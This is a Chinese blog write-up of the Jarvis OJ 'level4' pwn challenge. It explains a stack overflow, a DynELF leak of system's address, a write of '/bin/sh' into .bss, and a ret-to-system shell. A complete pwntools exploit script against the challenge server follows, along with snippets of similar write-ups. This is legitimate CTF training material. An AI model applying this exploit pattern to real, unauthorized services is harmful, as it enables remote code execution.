Jarvis OJ-pwn level4(利用DynElf泄漏system地址)

最新推荐文章于 2020-12-20 12:02:16 发布
最新推荐文章于 2020-12-20 12:02:16 发布
阅读量238 收藏
点赞数
分类专栏: Jarvis OJ CTF解题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hanqdi_/article/details/104215216
版权

pwn level4

借助DynELF实现无libc的漏洞:这篇讲的挺好

  1. 检查保护机制
    在这里插入图片描述
  2. ida打开文件,发现read函数栈溢出漏洞,想要用ret2libc解决,但是在漏洞函数前没有其他函数执行,所以不能进行泄漏函数得到libc版本。
    在这里插入图片描述
    在这里插入图片描述
  3. 在无libc情况下,通过DynELF进行泄漏system函数。有了system地址,但是没有binsh字符串,这里可以通过read函数,从标准输入,写到bss段,然后把写入bss地址的内容作为system函数的参数,实现利用。
  4. 寻找bss段地址:在gdb里输入vmmap即可,找到可读可写的地址范围。
    在这里插入图片描述
    在这里插入图片描述
  5. 利用脚本如下:
from pwn import *
r = remote("pwn2.jarvisoj.com",9880)
e = ELF('./level4')
write_plt = e.symbols['write']
vul_addr = 0x804844b
bss_addr = 0x804a024
def leak(address):  #这是DynELF泄漏system的模版
    payload1 = 'a'*0x88+'bbbb'+p32(write_plt)+p32(vul_addr)+P32(1)+p32(address)+p32(4)
    r.sendline(payload1)
    data = r.recv(4)
    return data
d = DynELF(leak,elf=e)
system_addr = d.lookup('system','libc')
print hex(system_addr)
read_plt = e.symbols['read']
payload2 = 'a'*0x88+'bbbb'+p32(read_plt)+p32(vul_addr)+p32(0)+p32(bss_addr)+p32(8)
r.sendline(payload2)
r.send('/bin/sh\x00')
payload3 = 'a'*0x88+'bbbb'+p32(system_addr)+'bbbb'+p32(bss_addr)
r.sendline(payload3)
r.interactive()
123111234
关注
专栏目录
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
CTF-PWN-level4(jarvis oj)
SuperGate的博客
02-18 296
这道题只出现了read函数以及write函数。checksec也只发现了NX。 这次并没有给出libc的文件,所以我们可以考虑使用pwntools中的DynELF泄漏system地址,然后将'/bin/sh'写入.bss段中保存,在调用system函数的时候载入.bss保存的相应地址即可 exp如下 from pwn import * context(os='linux',arch='i3...
[BUUCTF]PWN——level4
mcmuyanga的博客
11-03 297
level4 附件 步骤: 例行检查,32位程序,开启了NX保护 运行一下程序,看看大概的情况 32位ida载入,首先检索程序里的字符串,根据上一步运行看到的字符串进行跳转 输入点在function里 参数buf存在溢出漏洞,字符串里没有找到现成的后门可以利用,所以使用ret2libc的方法来获取shell 利用过程: 泄露libc版本 只能通过程序里已经调用过的函数才行,这里利用的read函数 read_got=elf.got['read'] write_plt=elf.plt['writ
Jarvis Oj Pwn 学习笔记-level4
baoan4763的博客
05-31 199
没有libc?!DynELF了解一下 来,链接: https://files.cnblogs.com/files/Magpie/level4.rar nc pwn2.jarvisoj.com 9880 我抽着差不多的烟,又check差不多的sec: 扔进IDA: 和level3差不多,只是这道题没有提供libc 这道题其实主要就是学一下pwntools的一个工...
(Jarvis Oj)(Pwn) level4
Nothing
05-01 1158
(Jarvis Oj)(Pwn) level4 先看一下保护措施,没什么奇怪的地方。 这次并没有给libc的文件,开始通过泄露得到的__libc_start_main地址对照libc库,并没有成功。于是就学了一波DynELF,这个模块的原理还是不太清楚(玄学),以后来填。总之利用这个模块可以找到system的地址,但是找不到”/bin/sh”这个字符串位置,但是我们可以控制read函数,所...
Writeup of level4(Pwn) in JarvisOJ
cossack9989的博客
02-16 1277
大年初一浅浅地学了个leak?0x00 What is DynELF?pwntool-DynELF详见官方文档咯~0x01 checksecroot@kali:~/Desktop/Pwn/level4# checksec level4 [*] '/root/Desktop/Pwn/level4/level4' Arch: i386-32-little RELRO: P...
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
JarvisAlgorithm:Jarvis算法-Java
03-06
Jarvis算法,又称礼品包装算法,是计算几何领域中用于寻找给定点集的凸包的经典算法。这个算法由Marvin Jarvis于1973年提出,主要用于处理二维空间中的点集问题。在Java编程语言中,我们可以实现这个算法来创建一个...
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
栈溢出利用DynELF实例
M021的专栏
10-07 4151
无libc库函数时,利用DynELF实现漏洞利用
借助DynELF实现无libc的漏洞利用小结
_wells的博客
03-30 3344
转自:http://bobao.360.cn/learning/detail/3298.html    前言 在没有目标系统libc文件的情况下,我们可以使用pwntools的DynELF模块来泄漏地址信息,从而获取到shell。本文针对linux下的puts和write,分别给出了实现DynELF关键函数leak的方法,并通过3道CTF题目介绍了这些方法的
泄漏地址总结(Dynelf & LibcSearcher)
weixin_44319142的博客
04-16 2659
Dynelf泄漏modeul 32位 p = process('./xxx') def leak(address): #address指要泄露地址 #各种预处理 payload = "xxxxxxxx" + address + "xxxxxxxx" p.send(payload) #各种处理 data = p.recv(4) log.debug("%#x => %...
JarvisOJ level4
PLpa的博客
07-08 2318
这题与level3相比就是就是题目并没有给出对应的libc文件,这里就要学习使用一波DynELF函数了,这是pwntools的一个函数,使用前请确认安装完整pwntools工具。 前言: DynELF函数是通过已知函数,迅速查找libc库,并不需要我们自己本身知道对应版本的libc文件。 这是DynELF函数使用的一个模板: def leak(address): payload=pad+p...
18.9.20 Jarvis OJ PWN----[XMAN]level4
qq_42192672的博客
09-20 482
checksec之后,发现可以栈溢出 找可以溢出的地方 我们可以读取无穷无尽的数 但是在IDA中没找到system函数,同时题目也没有给我们lib文件,咋办………… 根据大佬的资料,了解到了pwntools的一个函数DynELFDynELF函数可以leak system的真实地址,当然最后我们还是要用rop代码重新还原回去执行的 先看一下DynELF怎么用,基本流程如下 d ...
pwn学习-jarvisoj-level4-无libc的漏洞利用
qq_45653588的博客
12-20 280
这题下载文件下来,文件与level3反编译后伪代码基本一样,只是相比level3少了一个libc文件。level3 vulnerable_function()中存在明显的栈溢出,分配了0x88的空间,能输入0x100的内容。 ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] return read(0, &buf, 0x100u); } 同样以payload payload = 'a' * 0x8c + p32
RCTF - Exploitation 200 welpwn - writeup
HiTaQini
12-02 2956
RCTF 2015 welpwn 200 linux 64位 栈溢出 ROP + leak libc
jarvisoj pwn level5 wp
zszcr的博客
03-26 1977
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
jarvisoj level4 wp ROP及DynELF模块
ditto的博客
12-31 539
拿到题目 开启了NX。 放IDA里: 栈溢出。 程序本身没有调用system函数 无法ret2plt。 且题目本身没有给出目标的动态库的版本。题目本身有write函数,可以泄露内存,则可以利用pwntools的DynELF模块,找到system函数。 本身程序段没有/bin/sh的字符串,则需要使用read函数将字符串读入,read函数有三个参数,这就需要pop pop pop ret这...
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,只是连接的地址不同。引用是一篇关于pwntools基本用法的文章,并提供了一些常用的函数和方法。根据这些引用内容,可以得出结论,jarvisoj_level0是一个存在栈溢出漏洞的程序,可以通过构造特定的payload来执行系统调用函数,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jarvisoj_level0](https://blog.csdn.net/weixin_56301399/article/details/125919313)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jarvisOJ-level0](https://blog.csdn.net/qq_35661990/article/details/82889103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [jarvis oj---level0解题方法](https://blog.csdn.net/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值